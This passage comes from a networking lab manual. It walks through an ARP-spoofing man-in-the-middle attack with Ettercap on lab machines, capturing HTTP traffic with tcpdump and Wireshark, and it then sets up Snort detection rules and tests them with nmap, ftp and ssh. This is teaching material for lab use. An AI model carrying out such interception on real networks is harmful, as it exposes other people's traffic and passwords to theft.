192.168.58.2 and click Add to Target 1.

Next select the IP of your Windows 10 machine (in my case it’s 192.168.58.129) and click Add
to Target 2.

Now if you would like to view which Targets have been selected you can do so by selecting the 3
vertical dots again and clicking on Targets and view Current Targets. (See screenshots below)
Step #5 – Starting the Spoofing Attack
Now we have 2 targets added that we want to conduct the MitM attack on, poisoning the ARP
cache of our Windows 10 machine.

Remember we will be sitting in the middle of the gateway and the target. The default gateway
(router) will think that the target IP is our MAC address and forward all traffic to our attack
machine.

The Windows 10 machine will think that the router or default gateway IP is our MAC address
and forward all traffic to our Kali attack machine.

For our attack machine to correctly then forward the traffic to and from both targets, we need to
enable IP forwarding. This is done by entering the following command via the terminal:

sudo sysctl -w net.ipv4.ip_forward=1

We need to now select the type of attack by going to the MitM menu or drop down in Ettercap.
Select the earth icon in the top right of the application window. You will see a list of attacks.

We want to select the first one, ARP Poisoning. Once that is selected, it will bring up a small
window in which we select OK, keeping the current default choices. (See screenshots below)
Ettercap begins sending crafted ARP packets to both Targets.

Step #6 – Analyzing Traffic in Wireshark

Now, go to your Windows 10 machine and open a browser and go to an HTTP website. In this
example, I went to both popcorn.com and website.org. (Both HTTP not HTTPS)

Now we need a way to analyze the traffic on our network to see if the target’s traffic is being sent
to our machine. There are several ways of doing this. For this tutorial, I used tcpdump to dump
the traffic. I also used -w flag to write the traffic’s output to a .pcap file that I then analyzed with
Wireshark.

Pay close attention to the tcpdump and Wireshark screenshots as they will show that our attack
machine intercepted the traffic going to and from popcorn.com and website.org.
http://testphp.vulnweb.com/login.php

Or in google search you can give

“any http site for testing”

In a real attack where the user would unknowingly think that their traffic was secure, we could
potentially see passwords or other information entered by the user on those sites.

Lastly, I want to go over the tcpdump command that we need to enter in the terminal to capture
the traffic. On our Kali machine pull up the terminal and enter the following:

sudo tcpdump -i eth0 -A -v port 80

This tells tcpdump the interface on which to capture or listen to the traffic by using the -i flag.

If you are using a wireless interface the flag becomes -I.

Eth0 is simply the ethernet interface. The -A flag will display the content of the packets in ASCII
which is very useful for seeing what websites a user visited or if, for example, they used the FTP
protocol we could see passwords in cleartext.

The -v simply is a verbose command allowing us to see more information. And since we wanted
to see what websites the victim machine visited, we use port 80 to capture HTTP traffic.

In order to analyze the traffic with Wireshark we repeat the same command but add the -w flag
which writes it to a .pcap file like so: (See screenshots below)

sudo tcpdump -i eth0 -A -v port 80 -w etter_arp.pcapCode language: CSS (css)

Note: Once tcpdump starts capturing packets you will see the counter represent the number of
packets captured.
As you can see both websites our Windows 10 machine visited, we were able to capture using
Ettercap from our Kali VM.

After performing the attack, make sure to stop the MitM attack by going to the stop icon shown
above. (Next to the earth icon)

Then in the top left of the application window, you will want to press the square icon to stop the
unified sniffing.
Conclusion and next steps
Ettercap is a great tool for understanding how this type of attack happens. I think the developer
team did an awesome job updating the interface and its features.

If you enjoyed this tutorial on ARP Spoofing with Ettercap and Wireshark, check out the other
attacks Ettercap can perform and continue to learn how these protocols can affect our networks in
making them less or more secure!

Categories:Cybersecurity Fundamentals, Network Security

 Experiment 10

INTRODUCTION TO SNORT
 Snort is an open source tool [1] for Intrusion Detection and Prevention System.
 It uses a series of rules that help define malicious network activities and uses those rules to
find packets that matchagainst them and generates alerts for users.
 Snort has three primary uses:
 As a packet sniffer like tcpdump
 As a packet logger — which is useful for network trafficdebugging
 As a full-blown network intrusion prevention system
FEATURES OF SNORT
 RULES: To generate rules to identify various kinds of scans such as TCP scan, UDP scan,
FIN scan, etc.
 https://dev.to/ankitsahu/install-snort-on-kali-1co8ATTACK DETECTION: To
detect network scanning attacks,DoS attack, malware attack, etc.

Step1: Download snort

Sudo apt-get install snort-y

Open config file.

81
Open local.rules

Add the below lines, make sure to have the correct permission.

alert icmp $EXTERNAL_NET any->$HOME_NET (msg:"BIT message"; sid:5889; rev:1;)

alert tcp any any -> $HOME_NET 21 (msg:"FTP Attempted"; sid:60001; rev:1;)
alert tcp any any -> $HOME_NET 22 (msg:"SSH Attempted"; sid:60002; rev:1;)

82
Test the snort.conf file

83
..
..
..

Step : Run the snort with the updated snort.conf file after successful validation of the snort.conf file.

84
Step : Open Kali to send the connection request to the Ubuntu machine using its IP address

85
Step: Run
nmap 10.10.10.109
ftp 10.10.10.109
Ssh 10.10.10.109

As show below.

86
Step: Connection request will the highlited with the costum message from the snort.conf file in the
configuration file.

87
88